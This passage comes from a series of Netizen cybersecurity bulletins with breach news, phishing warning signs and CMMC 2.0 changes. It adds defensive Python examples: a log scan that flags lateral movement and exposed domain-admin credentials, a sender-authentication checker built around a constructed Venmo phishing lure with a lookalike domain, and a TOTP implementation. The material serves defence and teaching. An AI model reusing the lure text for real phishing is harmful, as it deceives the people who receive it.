    Federal investigators claim that while attempting to download the data, Sharp’s internet connection briefly failed, disrupting his VPN connection and exposing his internet address. Sharp maintains his innocence and claims the VPN subscription tying him to the crime must have been purchased by someone else using his PayPal account.

    Prosecutors are charging Nickolas Sharp with intentionally damaging protected computers, making false statements to the FBI, transmitting interstate communications with the intent to extort, and wire fraud. If found guilty, Sharp faces a maximum sentence of 37 years in prison.

    Following the announcement of this data breach in a March disclosure, Ubiquiti’s stock tumbled 20%, erasing $4 billion in market cap.

    To read more about this article, click here.

    IKEA Fights Ongoing Phishing Campaign

    While many Americans were out shopping on Black Friday, Swedish furniture retailer IKEA was busy fighting an ongoing internal phishing campaign rather than hordes of shoppers. Reports from inside IKEA show that a reply-chain email attack is being used to install malware on unsuspecting employees’ devices through malicious download links hidden in attached documents. This attack differs from most phishing campaigns in that the attackers send their lures from legitimate, already-compromised company email accounts, replying inside existing email threads so the messages look like part of a normal conversation, and use them to distribute malware, including ransomware.

    After detecting the attack, IKEA has been on high alert and has urged all employees to use caution when opening or replying to any email in their inboxes. At this time, official IKEA accounts, as well as accounts at distributors, suppliers, and other organizations with ties to IKEA, are considered compromised. IKEA’s internal security team has detected numerous malicious emails sent to employees from accounts at many of its business partners.

    IKEA’s security teams have warned employees that the malicious reply-chain emails contain links ending in seven-digit codes, and have circulated an example email so staff know what to look for. Employees have also been advised not to open any suspicious email, regardless of the sender, and to report it immediately to the IT department.

    On Tuesday, an IKEA spokesperson was pressed on the matter and asked whether the phishing attack had been contained. He responded, “IKEA takes this matter very seriously. We continue to monitor to ensure that our internal defense mechanisms are sufficient. Actions have been taken to prevent damages, and a full-scale investigation is ongoing.”

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service” offering, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Overview

    • Phish Tale of the Week
    • CMMC Halted, CMMC 2.0 On The Horizon
    • Global Supply Chain At War Against Dark Web Cybercriminals
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees who may be expecting an invoice to be paid, or simply anyone who doesn’t check their email rigorously. This email appears to be a notification saying $500 has been sent to our Venmo account. It carries Venmo’s branding and a convincing message telling us to complete the necessary steps to finish the process, so why not click the link? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag in this email is the sender address. Always inspect the sender address thoroughly to ensure it’s from a trusted sender. Check suspicious emails from companies against previous correspondence you’ve received and make sure the sender address is the same.
    2. The second warning sign is the lack of consistent messaging. The image in the email shows that $500 has been sent to my account, but there is no other information available. Normally, when you receive money on Venmo, a receipt is sent to your inbox naming the party that sent the money and the total amount. In this case, there are no further details on this payment.
    3. The final warning sign is the callout at the bottom. The message simply says “accept money”. Brief messaging is commonly used in scams like this so that people read what little is there and click as fast as possible. One easy way to spot a scam email is to compare it against previous emails you’ve received from the company. When compared to other correspondence from Venmo, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match one you already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company that claims to be sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to provide Personally Identifiable Information (PII) such as credit card numbers or your social security number? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and that the site uses HTTPS. Keep in mind that HTTPS alone proves nothing about who runs the site; phishing pages routinely use valid certificates, so the domain name is what matters.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Venmo-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    CMMC Halted, CMMC 2.0 On The Horizon

    Earlier this month, sources inside the Pentagon summarized the changes coming to the Cybersecurity Maturity Model Certification (CMMC) program. These changes come almost a year after CMMC was first introduced to the DoD supply chain. CMMC is a set of security requirements that DoD vendors and suppliers must meet to better protect the flow of sensitive information and improve their security posture. The Department of Defense has halted all official audits and implementations of the framework pending the release of the revised version later this year.

    The goal of the program was to require every defense contractor that handles Controlled Unclassified Information (CUI) to undergo a third-party audit to determine its compliance with the controls outlined in the original release of CMMC. The federal government had planned to pilot the certification with multiple programs, but those plans are now stalled. According to the Pentagon, the previous requirements and guidelines from CMMC will be rolled into CMMC 2.0, with discussion and collaboration within the industry intended to help streamline the process.

    The driving concern behind CMMC was that Pentagon officials believed the existing system, in which defense contractors self-attest their compliance with cybersecurity standards from the National Institute of Standards and Technology (NIST), was not working. This was further confirmed after the U.S. saw a nationwide increase in cyberattacks at the beginning of and throughout most of 2021.

    The original CMMC guidelines established five levels of security for vendors to meet, with the required level depending on the sensitivity of the information they process or possess. CMMC 2.0 proposes removing levels two and four from the standard, leaving three. All level one suppliers would self-attest to their cybersecurity readiness. The new level two (previously level three) would be split between priority and non-priority acquisitions: priority acquisitions would still require an independent third-party assessment, while non-priority acquisitions could rely on an annual self-assessment. The rules for the new level three (previously level five) have yet to be released.

    CMMC 2.0 is also expected to remove the additional practices and maturity processes that CMMC layered on top of the NIST controls last year and instead rely solely on the controls in NIST SP 800-171. In line with this, CMMC 2.0 will now accept Plans of Action and Milestones (POA&Ms), which had initially been ruled out last year. The final set of changes and requirements for CMMC 2.0 have yet to be released but are due out by the end of the year.

    To read more about this article, click here.

    Global Supply Chain At War Against Dark Web Cybercriminals

    Many Americans have been suffering supply chain shortages for months now. Whether it is toilet paper, a new PlayStation 5, or a pair of winter boots, goods are not as easy to get your hands on as they once were. Economists have blamed these shortages on many issues surrounding the pandemic and state of the global economy. To make matters worse, supply chain vendors are now faced with an onslaught from cybercriminals on the dark web selling sensitive information that could compromise these companies.

    Cyber intelligence firm Intel 471 recently reported a spike in dark web activity involving user credentials from ground, maritime, and air cargo transport vendors being sold on underground marketplaces. These criminals have leveraged vulnerabilities in virtual private network (VPN) appliances, exposed Remote Desktop Protocol (RDP) services, and other products from vendors such as Citrix and SonicWall to gain access to these organizations.

    Intel 471 researchers reported, “We’ve witnessed ransomware attacks on the shipping industry throughout the year, which has undoubtedly put a constraint on companies that are already stretched thin due to the pandemic.”

    By the beginning of 2021, the four largest global maritime shipping companies had all been victims of cyber-attacks, leaving many wondering how. A deeper dive into the dark web revealed that access to many of these companies was being advertised on underground forums. In October 2021, cybercriminals on one forum stated they had access to a U.S.-based freight company and could provide administrator access to multiple computers on its network. In August, just months earlier, an unknown threat actor with ties to the Conti ransomware gang had claimed similar access to a U.S.-based transportation management firm.

    These attacks are hindering shipping operations across the globe, and vendors need to take notice immediately. As more pressure is put on suppliers to move goods worldwide, companies must improve their cybersecurity posture. These recent attacks have proven that shippers are lucrative targets for cybercriminals, and the attacks won’t stop until there is pushback.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service” offering, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Netizen Corporation awarded HIRE Vets Platinum Medallion for the 4th year in a row.

    Allentown, PA: Netizen Corporation, an ISO 27001:2013, ISO 9001:2015, and CMMI Level 3 certified provider of cybersecurity and related solutions for defense, government, and commercial markets, has received a HIRE Vets Platinum Medallion award from the U.S. Department of Labor for the fourth year in a row, recognizing the hiring, retention, support, and training of military veterans and their families. This is the highest level of award available under the program and is given to select companies demonstrating superior commitment to veteran employment and the overall military/veteran community. Netizen employs a significant percentage of veterans nationwide to support federal, commercial, and government contracts, while also providing free training, college scholarships, and paid internships to help veterans and military families obtain careers in high-demand technical fields such as cybersecurity.

    The HIRE Vets Medallion program was established under the Honoring Investments in Recruiting and Employing American Military Veterans Act, or HIRE Vets Act, signed into law on May 5, 2017, to recognize employers who hire, retain, and support military veterans. The Platinum Medallion is the highest level of award a company can receive under this program, and the citation states that “[Netizen] has demonstrated a model of patriotism worthy of praise as well as a recognition of the value veterans bring to the workplace.”

    “At Netizen we take pride in our military service, and are heavily involved in the veteran community providing scholarships, internships, training, education, and support to organizations in the Lehigh Valley region and beyond. As a veteran-owned company, we have always been keenly aware of the benefits and skills that military veterans bring to an organization and offer programs to help them enter and thrive in technical career fields by working with colleges, service organizations, and other groups to continuously expand our award-winning military and veteran support programs,” said Michael Hawkins, Netizen CEO, and a U.S. Army veteran.

    About Netizen Corporation:

    America’s fastest-growing cybersecurity firm, 2nd fastest-growing Veteran-owned company, and 47th fastest-growing private company overall according to the 2019 Inc. 5000 list of the nation’s most successful businesses, Netizen provides specialized cybersecurity solutions for government, defense, and commercial markets. They also develop innovative products such as the award-winning Overwatch Governance Suite.

    The company, a certified Service Disabled Veteran Owned Business (SDVOSB), is based in Allentown, PA with additional locations in Virginia, South Carolina, and Florida. In addition to having been one of the fastest-growing businesses in the US, Netizen has also been named a national “Best Workplaces” by Inc. Magazine and has received the US Department of Labor HIRE Vets Platinum Medallion award for veteran hiring, retention, and community involvement four years in a row. Learn more at Netizen.net.

    POINT OF CONTACT
    Tristan Boheim
    Marketing Manager
    1-484-294-1331
    press@netizen.net

  • Sinclair Broadcast Group Ransomware Attack: How it happened and what this means.

    Last week, millions of television viewers were shocked when a nationwide shutdown occurred, targeting local television stations owned by Sinclair Broadcast Group. Sinclair is one of the largest telecommunications conglomerates in the country, owning 294 stations and covering 100 different markets, giving them about 40% coverage of all American households. Sinclair acknowledged the breach last Monday in a statement saying:

    “On October 16, 2021, the company identified and began to investigate and take steps to contain a potential security incident. On October 17, 2021, the company identified that certain servers and workstations in its environment were encrypted with ransomware, and that certain office and operational networks were disrupted.”

    Shortly after this breach, Sinclair disclosed the full extent of the attack to the SEC. They highlighted that the ransomware disrupted its general and office operations, with nationwide outages and data exfiltration also occurring. Luckily, the company’s response has been swift, implementing their incident-response plan within minutes of being alerted to the breach.

    How did we get here?

    October has proven to be one of the busiest months for ransomware gangs with major breaches occurring at Twitch and Ferrara Candy just weeks ago. Researchers believe that Sinclair was targeted in this instance due to its reliance on local advertiser revenue. These advertisers promote their products in smaller markets across the country and cannot afford to waste their ad-spend on weeklong outages. By taking away these revenue streams, the threat actors have pushed Sinclair into a corner where they either have to pay the ransom to get operations back online or risk losing more of their advertisers’ investments. 

    What does this mean?

    Following the attack, many of Sinclair’s stations resumed operations in the middle of the week, with only a handful of minor issues still lingering. Investigators found that all of the stations were joined to a single central Sinclair Active Directory domain, which allowed the attackers to pivot from station to station across the network once they had a foothold.

    Another issue that may prove troublesome later is the extent of the data that was taken. Sinclair disclosed that data exfiltration occurred during the breach but has yet to identify what information was stolen. Other security experts are concerned about the entry point the attackers used to gain access to Sinclair’s systems. That foothold could be reused for re-entry and further attacks if Sinclair does not properly remediate all known vulnerabilities in its network.

    What is the solution?

    Ironically, this wave of breaches falls during Cybersecurity Awareness Month, and organizations have to prioritize security initiatives moving forward. If enterprise-grade companies like Sinclair can be breached, think of the damage that can be done to smaller organizations with less funding for security. MFA (multi-factor authentication) and forced password resets are a good place to start but are not a cure-all. More thought needs to be given to the segmentation and mapping of an organization’s network. Lower-tier users and their credentials should not carry access that can be exploited to open multiple doors inside a network, and privileged accounts should never be used on lower-tier machines where their credentials can be harvested. This focus on identity and privilege management needs to be brought to the top of security discussions moving forward.
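    The pivoting described above (one domain, one foothold, every station reachable) leaves a trail in the Windows Security log that defenders can hunt for. The script below is an added example written for this bulletin, not Sinclair’s or Netizen’s code: it parses a constructed set of event 4624 (successful logon) records, with hypothetical station hostnames, account names and thresholds, flags any account that authenticated remotely to an unusual number of distinct hosts inside a short window, and flags privileged (Tier-0) accounts used on machines outside the Tier-0 set, which is the privilege-management failure the paragraph above warns about.

```python
"""Spot station-to-station pivoting and admin-tier violations in Windows
Security event 4624 (successful logon) records.

Added example; the log lines, hostnames, account names and thresholds below
are constructed and hypothetical."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of 4624 records in a flattened key=value form.
# "Computer" is the host that recorded the logon (where the session landed).
# LogonType 3 = network (SMB/WMI/PsExec), 10 = RDP, 2 = console.
SAMPLE_LOG = """\
TimeCreated=2021-10-17T02:00:05 EventID=4624 Computer=STN-KABC-EDIT01 TargetUserName=svc_deploy LogonType=3 IpAddress=10.10.1.23
TimeCreated=2021-10-17T02:01:12 EventID=4624 Computer=STN-KABC-EDIT02 TargetUserName=svc_deploy LogonType=3 IpAddress=10.10.1.23
TimeCreated=2021-10-17T02:02:40 EventID=4624 Computer=STN-WXYZ-PLAY01 TargetUserName=svc_deploy LogonType=3 IpAddress=10.10.1.23
TimeCreated=2021-10-17T02:03:51 EventID=4624 Computer=STN-WXYZ-PLAY02 TargetUserName=svc_deploy LogonType=3 IpAddress=10.10.1.23
TimeCreated=2021-10-17T02:05:09 EventID=4624 Computer=STN-KDEF-MCR01 TargetUserName=svc_deploy LogonType=3 IpAddress=10.10.1.23
TimeCreated=2021-10-17T02:06:30 EventID=4624 Computer=STN-KDEF-MCR02 TargetUserName=svc_deploy LogonType=10 IpAddress=10.10.1.23
TimeCreated=2021-10-17T08:15:00 EventID=4624 Computer=STN-KABC-EDIT01 TargetUserName=jdoe LogonType=2 IpAddress=-
TimeCreated=2021-10-17T08:20:00 EventID=4624 Computer=STN-KABC-FS01 TargetUserName=jdoe LogonType=3 IpAddress=10.10.1.41
TimeCreated=2021-10-17T09:00:00 EventID=4624 Computer=STN-WXYZ-PLAY01 TargetUserName=da_admin LogonType=10 IpAddress=10.20.0.5
TimeCreated=2021-10-17T09:30:00 EventID=4624 Computer=DC01 TargetUserName=da_admin LogonType=2 IpAddress=-
TimeCreated=2021-10-17T10:00:00 EventID=4672 Computer=DC01 TargetUserName=da_admin LogonType=2 IpAddress=-
"""

KV_RE = re.compile(r"(\w+)=(\S+)")
REMOTE_LOGON_TYPES = {3, 10}


def parse_events(log_text):
    """Parse flattened records into dicts, keeping only 4624 logons, time-ordered."""
    events = []
    for line in log_text.splitlines():
        fields = dict(KV_RE.findall(line))
        if fields.get("EventID") != "4624":
            continue
        events.append({
            "time": datetime.fromisoformat(fields["TimeCreated"]),
            "user": fields["TargetUserName"].lower(),
            "logon_type": int(fields["LogonType"]),
            "host": fields["Computer"].upper(),
            "source": fields.get("IpAddress", "-"),
        })
    return sorted(events, key=lambda e: e["time"])


def find_lateral_movement(events, window=timedelta(minutes=30), min_hosts=5):
    """Return {user: [hosts]} for accounts that logged on remotely to at least
    min_hosts distinct computers inside any sliding window of length `window`."""
    by_user = defaultdict(list)
    for e in events:
        if e["logon_type"] in REMOTE_LOGON_TYPES:
            by_user[e["user"]].append(e)
    flagged = {}
    for user, evs in by_user.items():  # evs keep the global time order
        hits, start = set(), 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            hosts = {e["host"] for e in evs[start:end + 1]}
            if len(hosts) >= min_hosts:
                hits |= hosts
        if hits:
            flagged[user] = sorted(hits)
    return flagged


def find_tier_violations(events, tier0_accounts, tier0_hosts):
    """Return (user, host) pairs where a Tier-0 (domain admin) account logged on
    to a host outside the Tier-0 set, leaving its credentials exposed there."""
    accounts = {a.lower() for a in tier0_accounts}
    hosts = {h.upper() for h in tier0_hosts}
    return sorted({(e["user"], e["host"]) for e in events
                   if e["user"] in accounts and e["host"] not in hosts})


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOG)
    for user, hosts in find_lateral_movement(evs).items():
        print(f"possible lateral movement by {user}: {', '.join(hosts)}")
    for user, host in find_tier_violations(evs, {"da_admin"}, {"DC01", "DC02"}):
        print(f"tier-0 account {user} used on non-tier-0 host {host}")
```

    In a real environment, feed it the 4624 events from your SIEM, tune `min_hosts` and `window` against a baseline of normal service-account behaviour, and treat the tier-violation list as a policy check rather than an alert: every hit is a place where a domain admin’s credentials have been cached on a lower-tier host.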

    How Can Netizen Help?

    Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service” offering, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Overview

    • Phish Tale of the Week
    • Twitch reports data breach of over 128 GB
    • Google announces new two step verification initiative
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees who may be expecting an invoice to be paid, or simply anyone who doesn’t check their email rigorously. This email appears to be a notification saying we have won $750 on Cash App. It carries Cash App’s branding and a convincing message saying my $750 reward expires soon, so why not click? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag in this email is the sender address. Always inspect the sender address thoroughly to ensure it’s from a trusted sender. Check suspicious emails from companies against previous correspondence you’ve received and make sure the sender address is the same.
    2. The second warning sign is the inconsistent messaging. The image in the email shows that I can win $750, yet the message says I have already won the money. Look for consistency throughout emails from companies. Most companies will also provide a lengthy terms and conditions section for prizes and competitions.
    3. The final warning sign is the callout at the bottom. The message says that my reward is expiring soon, although this is the first notice we’ve received about this payment. An easy way to spot a scam email is to compare it against previous emails you’ve received from the company. When compared to other correspondence from Cash App, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match one you already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company that claims to be sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to provide Personally Identifiable Information (PII) such as credit card numbers or your social security number? A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and that the site uses HTTPS. Keep in mind that HTTPS alone proves nothing about who runs the site; phishing pages routinely use valid certificates, so the domain name is what matters.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.
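    “Verify that the sender is actually from the company” is easier to say than to do, because the From line is the one thing a phisher controls completely. What the recipient’s mail server can verify is the envelope sender (Return-Path), any Reply-To that quietly redirects responses, and the SPF/DKIM/DMARC verdicts it stamps into Authentication-Results. The script below is an added example for the Phish Tales in this bulletin and the Venmo one above; it is not code from Netizen or from either company. Both messages are constructed, and every domain other than venmo.com is a hypothetical lookalike.

```python
"""Check whether an email really comes from the company it claims to, by
comparing the visible From address with the envelope sender, Reply-To and
the receiving server's SPF/DKIM/DMARC verdicts.

Added example; the two messages below are constructed, and the domains other
than venmo.com are hypothetical lookalikes."""
import re
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed lure modelled on the Venmo Phish Tale: the From header says
# venmo.com, but everything the receiving server can verify points elsewhere.
SAMPLE_PHISH = """\
Return-Path: <bounce@mail-venm0-notify.example>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=mail-venm0-notify.example; dkim=none; dmarc=fail header.from=venmo.com
From: "Venmo" <no-reply@venmo.com>
Reply-To: support@mail-venm0-notify.example
To: employee@example.com
Subject: You have received $500

Complete the necessary steps to accept money.
"""

# Constructed legitimate-looking counterpart: the verifiable fields line up.
SAMPLE_LEGIT = """\
Return-Path: <bounces@venmo.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=venmo.com; dkim=pass header.d=venmo.com; dmarc=pass header.from=venmo.com
From: Venmo <no-reply@venmo.com>
To: employee@example.com
Subject: You received a payment

John Smith paid you $500.00.
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)


def domain_of(header_value):
    """Domain after '@' of the address in a From/Reply-To/Return-Path header."""
    addr = parseaddr(str(header_value))[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def parse_auth_results(header_value):
    """Map each authentication method to its result, e.g. {'spf': 'pass'}."""
    return {m.lower(): r.lower() for m, r in AUTH_RE.findall(str(header_value or ""))}


def assess_sender(raw_message, expected_domain):
    """Return a list of findings; an empty list means the sender checks out.

    Only trust an Authentication-Results header stamped by your own mail
    server; an attacker can insert a forged one further upstream."""
    msg = message_from_string(raw_message, policy=policy.default)
    findings = []
    from_domain = domain_of(msg.get("From", ""))
    expected = expected_domain.lower()
    if from_domain != expected and not from_domain.endswith("." + expected):
        findings.append(f"From domain {from_domain!r} is not {expected!r}")
    return_path = domain_of(msg.get("Return-Path", ""))
    if return_path and return_path != from_domain:
        findings.append(f"Return-Path domain {return_path!r} differs from From")
    reply_to = domain_of(msg.get("Reply-To", ""))
    if reply_to and reply_to != from_domain:
        findings.append(f"Reply-To domain {reply_to!r} differs from From")
    auth = parse_auth_results(msg.get("Authentication-Results"))
    for method in ("dkim", "dmarc"):  # a From domain that DMARC rejects is the key tell
        if auth.get(method) != "pass":
            findings.append(f"{method.upper()} result is {auth.get(method, 'missing')!r}")
    return findings


if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(label, assess_sender(raw, "venmo.com") or ["no findings"])
```

    The same checks apply to the Cash App lure: swap in the expected domain and the headers of the message you actually received. The lookalike domain (venm0 with a zero) also trips the From check on its own, which is why the domain, not the display name or the logo, is what to read.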

    For Cash App specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Twitch reports data breach of over 128 GB.

    Last week, an unknown actor released what appears to be the entirety of video streaming company Twitch’s source code in a data dump of more than 128 GB. Video Games Chronicle initially broke the story on Wednesday, reporting that an anonymous hacker had gained access to a large amount of Twitch’s private data, including creator payout information and source code. The hacker posted a torrent link to the trove on 4chan, citing the intent to “foster more disruption and competition in the online video streaming space” and that “their community is a disgusting toxic cesspool” as reasons for the leak.

    “Jeff Bezos paid $970 million for this, we’re giving it away FOR FREE. #DoBetterTwitch,” the hacker added.

    Representatives from Twitch were quick to confirm the breach giving this response to the press. “We can confirm a breach has taken place. Our teams are working with urgency to understand the extent of this. We will update the community as soon as additional information is available. Thank you for bearing with us.”

    Analysts everywhere have begun to sift through the leaked data, finding everything from encrypted passwords to financial payouts to some of Twitch’s top streamers. Twitch account holders are advised to change their passwords and enable two-factor authentication in the meantime to deter unauthorized sign-ins. The breach comes after a large portion of Twitch’s community took to social media with the #DoBetterTwitch campaign seeking a more inclusive and tolerant community.

    To read more about this article, click here.

    Google announces new two-step verification initiative.

    Recently, Google announced plans to automatically enroll almost 150 million users in two-step verification (2SV) by the end of the year. This effort is part of Google’s ongoing initiatives to prevent unauthorized access to user accounts. Google will also roll the program out to over 2 million YouTube creators, enabling the 2SV setting to better protect their channels from account takeover.

    Google product manager AbdelKarim Mardini and director of account security and safety Guemmy Kim added: “2SV is strongest when it combines both something you know (like a password) and something you have (like your phone or a security key).” This rollout follows announcements Google made in May in which the company laid out its vision for simpler and safer sign-in. You may not realize it, but passwords are the single biggest threat to account security: they are easily stolen, and many users reuse the same password across multiple sites, allowing one key to unlock limitless doors. Experts believe that as more companies push toward multi-factor authentication, overall security will improve, reducing the number of data breaches and unauthorized sign-ins.

    Google also announced plans to add a feature to the Google app that lets users access all of their saved passwords from Password Manager right from the app’s menu. This focus on passwords and account security by Google follows developments from Microsoft earlier this week detailing a new passwordless way to sign in to user accounts.
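    The “something you have” half of 2SV that Mardini and Kim describe is, for authenticator apps, a time-based one-time password (TOTP, RFC 6238): a secret shared at enrollment, an HMAC over the current 30-second time slot, and a six-digit code that a stolen password alone cannot reproduce. The implementation below is an added example, not Google’s code; it uses the published RFC 6238 test-vector seed so its outputs can be checked against the RFC, and the verifier’s skew tolerance is a design choice of this example.

```python
"""Time-based one-time passwords (RFC 6238), the "something you have" factor
behind authenticator apps.

Added example, not Google's code. RFC6238_SEED is the RFC's published
SHA-1 test-vector key, so totp(RFC6238_SEED, 59) must equal 287082."""
import base64
import hashlib
import hmac
import secrets
import struct
import time

RFC6238_SEED = b"12345678901234567890"


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based OTP (RFC 4226): HMAC-SHA1 over the big-endian counter,
    dynamic truncation to 31 bits, then the low `digits` decimal digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(key: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """TOTP is HOTP with the counter derived from Unix time // step."""
    return hotp(key, at // step, digits)


def verify_totp(key: bytes, submitted: str, at: int, skew: int = 1,
                step: int = 30, digits: int = 6) -> bool:
    """Accept the current code or one up to `skew` steps either side, to
    tolerate clock drift; compare in constant time to avoid timing leaks."""
    counter = at // step
    return any(hmac.compare_digest(hotp(key, counter + d, digits), submitted)
               for d in range(-skew, skew + 1))


def new_secret(nbytes: int = 20) -> str:
    """Fresh enrollment secret, base32-encoded as authenticator apps expect."""
    return base64.b32encode(secrets.token_bytes(nbytes)).decode()


def secret_to_key(b32_secret: str) -> bytes:
    """Decode the base32 secret shown at enrollment back to raw HMAC key bytes."""
    return base64.b32decode(b32_secret.upper())


if __name__ == "__main__":
    print("RFC 6238 vector, T=59:", totp(RFC6238_SEED, 59))
    secret = new_secret()
    key = secret_to_key(secret)
    now = int(time.time())
    code = totp(key, now)
    print("enrolled secret:", secret, "current code:", code,
          "verifies:", verify_totp(key, code, now))
```

    A server should also remember the last counter it accepted for each user and refuse anything at or below it, so that a code observed over someone’s shoulder cannot be replayed inside the same time step; that bookkeeping is left out here to keep the example to the algorithm itself.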

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service” offering, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • NEW Cooperative Ransomware Attack: How it happened and what this means.

    Over the weekend, NEW Cooperative Inc., a Fort Dodge, Iowa-based agricultural services firm, was crippled by a ransomware attack. The threat group BlackMatter has claimed responsibility for the attack and demanded a ransom of $5.9 million to decrypt the data they have locked. BlackMatter released additional information stating that the ransom will double to $11.8 million if it is not paid within five days.

    Reports from inside NEW Cooperative state that as soon as they noticed the attack, they took all systems offline to stop the spread of the ransomware. A spokesperson from NEW added, “NEW Cooperative recently identified a cybersecurity incident that is impacting some of our company’s devices and systems. Out of an abundance of caution, we have proactively taken our systems offline to contain the threat, and we can confirm it has been successfully contained.”

    The spokesperson later said that they have notified law enforcement and are working with CISA and data security experts to remediate the issue.

    How did we get here?

